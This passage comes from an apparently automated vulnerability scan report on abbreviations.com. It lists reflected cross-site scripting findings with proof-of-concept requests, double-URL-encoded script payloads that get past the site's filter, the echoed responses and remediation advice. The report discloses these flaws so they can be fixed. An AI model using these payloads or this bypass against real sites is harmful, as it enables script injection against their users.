URL = "bs.aspx?st=" + "abbr.jse5e15";alert(1)//7bcb080d8de" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

2.9. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baf28%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73b2621bbdb was submitted in the REST URL parameter 1. This input was echoed as baf28"><script>alert(1)</script>73b2621bbdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviationsbaf28%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73b2621bbdb/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:32:57 GMT
Connection: close
Content-Length: 27284


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbreviationsbaf28"><script>alert(1)</script>73b2621bbdb stand for?, What does abbreviationsbaf28">
...[SNIP]...

2.10. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14548%2522%253balert%25281%2529%252f%252fa75b5821976 was submitted in the REST URL parameter 1. This input was echoed as 14548";alert(1)//a75b5821976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviations14548%2522%253balert%25281%2529%252f%252fa75b5821976/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:34:01 GMT
Connection: close
Content-Length: 26845


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbreviations14548";alert(1)//a75b5821976";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbreviations14548";alert(1)//a75b5821976" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.
...[SNIP]...

2.11. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 5e49c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97f972b3084 was submitted in the REST URL parameter 1. This input was echoed as 5e49c</title><script>alert(1)</script>97f972b3084 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviations5e49c%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97f972b3084/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:37:12 GMT
Connection: close
Content-Length: 27412


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbreviations5e49c</title><script>alert(1)</script>97f972b3084 stand for?</title>
...[SNIP]...

2.12. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbreviations/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3533a%253cscript%253ealert%25281%2529%253c%252fscript%253e02ec5d2c02f was submitted in the REST URL parameter 1. This input was echoed as 3533a<script>alert(1)</script>02ec5d2c02f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbreviations3533a%253cscript%253ealert%25281%2529%253c%252fscript%253e02ec5d2c02f/ HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:35:33 GMT
Connection: close
Content-Length: 27211


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>02ec5d2c02f";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbreviations3533a<script>alert(1)</script>02ec5d2c02f" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbreviations3533a<script>
...[SNIP]...

2.13. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7370d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8f2cde6c5 was submitted in the REST URL parameter 1. This input was echoed as 7370d"><script>alert(1)</script>a8f2cde6c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /b1.aspx7370d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8f2cde6c5 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1grciv55jtc043nj02tmceql; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:04:10 GMT
Connection: close
Content-Length: 27095


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does b1.aspx7370d"><script>alert(1)</script>a8f2cde6c5 stand for?, What does b1.aspx7370d">
...[SNIP]...

2.14. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51536%253cscript%253ealert%25281%2529%253c%252fscript%253e7a00ceef170 was submitted in the REST URL parameter 1. This input was echoed as 51536<script>alert(1)</script>7a00ceef170 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /b1.aspx51536%253cscript%253ealert%25281%2529%253c%252fscript%253e7a00ceef170 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iab1cy45uqfjxpv3302ggknn; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:05:11 GMT
Connection: close
Content-Length: 27034


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>7a00ceef170";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "b1.aspx51536<script>alert(1)</script>7a00ceef170" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "b1.aspx51536<script>
...[SNIP]...

2.15. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bb6c%2522%253balert%25281%2529%252f%252fd18bcda9b02 was submitted in the REST URL parameter 1. This input was echoed as 9bb6c";alert(1)//d18bcda9b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /b1.aspx9bb6c%2522%253balert%25281%2529%252f%252fd18bcda9b02 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=t3ixkyvszgc35h2wjylwru45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:04:33 GMT
Connection: close
Content-Length: 26718


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "b1.aspx9bb6c";alert(1)//d18bcda9b02";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "b1.aspx9bb6c";alert(1)//d18bcda9b02" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

2.16. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload bbc7d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3af19687e3 was submitted in the REST URL parameter 1. This input was echoed as bbc7d</title><script>alert(1)</script>f3af19687e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /b1.aspxbbc7d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3af19687e3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oh2g2tf0l1wefs55qtaryc45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:05:54 GMT
Connection: close
Content-Length: 27265


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does b1.aspxbbc7d</title><script>alert(1)</script>f3af19687e3 stand for?</title>
...[SNIP]...

2.17. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1eeb%253cscript%253ealert%25281%2529%253c%252fscript%253e78129bb9875 was submitted in the REST URL parameter 1. This input was echoed as d1eeb<script>alert(1)</script>78129bb9875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspxd1eeb%253cscript%253ealert%25281%2529%253c%252fscript%253e78129bb9875 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:00 GMT
Connection: close
Content-Length: 27049


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>78129bb9875";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs.aspxd1eeb<script>alert(1)</script>78129bb9875" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "bs.aspxd1eeb<script>
...[SNIP]...

2.18. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 8840d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fb241ced95 was submitted in the REST URL parameter 1. This input was echoed as 8840d</title><script>alert(1)</script>9fb241ced95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspx8840d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fb241ced95 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:21 GMT
Connection: close
Content-Length: 27249


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does bs.aspx8840d</title><script>alert(1)</script>9fb241ced95 stand for?</title>
...[SNIP]...

2.19. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85bcf%2522%253balert%25281%2529%252f%252f43b53048b7 was submitted in the REST URL parameter 1. This input was echoed as 85bcf";alert(1)//43b53048b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspx85bcf%2522%253balert%25281%2529%252f%252f43b53048b7 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:25 GMT
Connection: close
Content-Length: 26690


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "bs.aspx85bcf";alert(1)//43b53048b7";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs.aspx85bcf";alert(1)//43b53048b7" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

2.20. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ea5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e305b24ff28e was submitted in the REST URL parameter 1. This input was echoed as 2ea5b"><script>alert(1)</script>305b24ff28e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspx2ea5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e305b24ff28e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:25:24 GMT
Connection: close
Content-Length: 27088


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does bs.aspx2ea5b"><script>alert(1)</script>305b24ff28e stand for?, What does bs.aspx2ea5b">
...[SNIP]...

2.21. http://www.abbreviations.com/bs.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 60dff<script>alert(1)</script>065acfc4527 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=60dff<script>alert(1)</script>065acfc4527 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:18:09 GMT
Connection: close
Content-Length: 26879


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>065acfc4527";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "60dff<script>alert(1)</script>065acfc4527" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "60dff<script>
...[SNIP]...

2.22. http://www.abbreviations.com/bs.aspx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 5fc81</title><script>alert(1)</script>fedac000817 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=5fc81</title><script>alert(1)</script>fedac000817 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
